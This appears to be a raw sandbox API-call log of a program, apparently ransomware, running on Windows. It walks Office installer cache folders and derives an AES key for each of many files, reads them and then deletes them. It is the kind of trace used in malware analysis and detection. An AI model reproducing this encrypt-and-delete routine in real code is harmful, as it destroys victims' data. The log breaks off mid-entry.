GetFileSize (in: hFile=0x394, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x15b5 [0126.801] ReadFile (in: hFile=0x394, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0126.867] CryptDestroyHash (hHash=0x284d528) returned 1 [0126.867] CryptDestroyKey (hKey=0x284d568) returned 1 [0126.867] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0126.868] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml")) returned 1 [0126.869] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0126.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeMUISet.msi", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeMUISet.msi", lpUsedDefaultChar=0x0) returned 17 [0127.274] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0127.275] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0127.275] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0127.275] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0127.275] GetFileSize (in: hFile=0x3b4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd4200 [0127.275] ReadFile (in: hFile=0x3b4, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0127.381] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0127.381] CryptDestroyKey (hKey=0x284d568) returned 1 [0127.381] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0127.382] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi")) returned 1 [0127.389] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0127.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeMUISet.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeMUISet.xml", lpUsedDefaultChar=0x0) returned 17 [0127.389] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0127.390] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0127.390] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0127.390] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0127.390] GetFileSize (in: hFile=0x3b8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x333 [0127.390] ReadFile (in: hFile=0x3b8, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0127.493] CryptDestroyHash (hHash=0x284d528) returned 1 [0127.493] CryptDestroyKey (hKey=0x284d568) returned 1 [0127.493] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0127.494] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml")) returned 1 [0127.495] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0127.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="osetupui.dll", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="osetupui.dll", lpUsedDefaultChar=0x0) returned 13 [0127.495] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0127.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="pss10r.chm", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pss10r.chm", lpUsedDefaultChar=0x0) returned 11 [0127.495] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0127.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="setup.chm", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="setup.chm", lpUsedDefaultChar=0x0) returned 10 [0127.495] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0127.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Setup.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Setup.xml", lpUsedDefaultChar=0x0) returned 10 [0127.496] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0127.496] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0127.496] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0127.496] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0127.496] GetFileSize (in: hFile=0x3b4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2488 [0127.496] ReadFile (in: hFile=0x3b4, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0127.619] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0127.619] CryptDestroyKey (hKey=0x284d568) returned 1 [0127.619] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0127.620] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0127.621] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0127.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellUI.MST", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellUI.MST", lpUsedDefaultChar=0x0) returned 12 [0127.621] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 0 [0127.621] FindClose (in: hFindFile=0x284d4e8 | out: hFindFile=0x284d4e8) returned 1 [0127.622] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0127.712] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0127.712] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0127.712] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0127.806] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0127.806] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0127.806] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0127.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AccessMUI.msi", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessMUI.msi", lpUsedDefaultChar=0x0) returned 14 [0127.853] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0127.853] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0127.853] CryptHashData (hHash=0x284d568, pbData=0x2823180, dwDataLen=0x100, dwFlags=0x0) returned 1 [0127.853] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0127.853] GetFileSize (in: hFile=0x3b4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x266a00 [0127.853] ReadFile (in: hFile=0x3b4, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0128.516] CryptDestroyHash (hHash=0x284d568) returned 1 [0128.516] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0128.516] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0128.517] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi")) returned 1 [0128.521] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0128.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AccessMUI.xml", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessMUI.xml", lpUsedDefaultChar=0x0) returned 14 [0128.573] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0128.573] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0128.573] CryptHashData (hHash=0x284d5e8, pbData=0x2823180, dwDataLen=0x100, dwFlags=0x0) returned 1 [0128.573] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0128.573] GetFileSize (in: hFile=0x3bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x545 [0128.574] ReadFile (in: hFile=0x3bc, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0128.610] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0128.610] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0128.610] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0128.611] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml")) returned 1 [0128.612] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0128.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AccLR.cab", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccLR.cab", lpUsedDefaultChar=0x0) returned 10 [0128.612] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0128.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="branding.xml", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="branding.xml", lpUsedDefaultChar=0x0) returned 13 [0128.613] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0128.618] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0128.618] CryptHashData (hHash=0x284d568, pbData=0x2823180, dwDataLen=0x100, dwFlags=0x0) returned 1 [0128.618] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0128.618] GetFileSize (in: hFile=0x3b4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x91975 [0128.618] ReadFile (in: hFile=0x3b4, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0128.815] CryptDestroyHash (hHash=0x284d568) returned 1 [0128.815] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0128.815] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0128.816] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml")) returned 1 [0128.821] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 0 [0128.821] FindClose (in: hFindFile=0x284d528 | out: hFindFile=0x284d528) returned 1 [0128.821] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0128.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AccessMUISet.msi", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessMUISet.msi", lpUsedDefaultChar=0x0) returned 17 [0128.821] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0128.822] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0128.822] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0128.822] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d5e8) returned 1 [0128.822] GetFileSize (in: hFile=0x3b8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd4200 [0128.822] ReadFile (in: hFile=0x3b8, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0129.061] CryptDestroyHash (hHash=0x284d528) returned 1 [0129.061] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0129.061] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0129.062] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi")) returned 1 [0129.069] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0129.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AccessMUISet.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessMUISet.xml", lpUsedDefaultChar=0x0) returned 17 [0129.069] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0129.070] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0129.070] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0129.070] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d5e8) returned 1 [0129.070] GetFileSize (in: hFile=0x3bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x333 [0129.070] ReadFile (in: hFile=0x3bc, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0129.086] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0129.086] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0129.086] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0129.087] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml")) returned 1 [0129.088] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0129.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Setup.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Setup.xml", lpUsedDefaultChar=0x0) returned 10 [0129.088] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0129.089] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0129.089] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0129.089] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d5e8) returned 1 [0129.089] GetFileSize (in: hFile=0x3b8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa40 [0129.089] ReadFile (in: hFile=0x3b8, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0129.108] CryptDestroyHash (hHash=0x284d528) returned 1 [0129.108] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0129.108] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0129.109] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0129.110] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 0 [0129.110] FindClose (in: hFindFile=0x284d4e8 | out: hFindFile=0x284d4e8) returned 1 [0129.114] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0129.128] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0129.128] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0129.128] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0129.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office32WW.msi", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office32WW.msi", lpUsedDefaultChar=0x0) returned 15 [0129.130] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0129.130] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0129.130] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0129.130] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d5e8) returned 1 [0129.130] GetFileSize (in: hFile=0x3bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1e6600 [0129.130] ReadFile (in: hFile=0x3bc, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0129.313] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0129.313] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0129.313] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0129.314] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi")) returned 1 [0129.321] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0129.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office32WW.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office32WW.xml", lpUsedDefaultChar=0x0) returned 15 [0129.321] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0129.322] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0129.322] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0129.322] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d5e8) returned 1 [0129.322] GetFileSize (in: hFile=0x3b8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10b2 [0129.322] ReadFile (in: hFile=0x3b8, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0129.343] CryptDestroyHash (hHash=0x284d528) returned 1 [0129.343] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0129.343] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0129.344] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 1 [0129.345] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0129.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ose.exe", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ose.exe", lpUsedDefaultChar=0x0) returned 8 [0129.345] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0129.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="osetup.dll", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="osetup.dll", lpUsedDefaultChar=0x0) returned 11 [0129.345] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0129.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OWOW32WW.cab", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OWOW32WW.cab", lpUsedDefaultChar=0x0) returned 13 [0129.345] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0129.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PidGenX.dll", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PidGenX.dll", lpUsedDefaultChar=0x0) returned 12 [0129.345] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 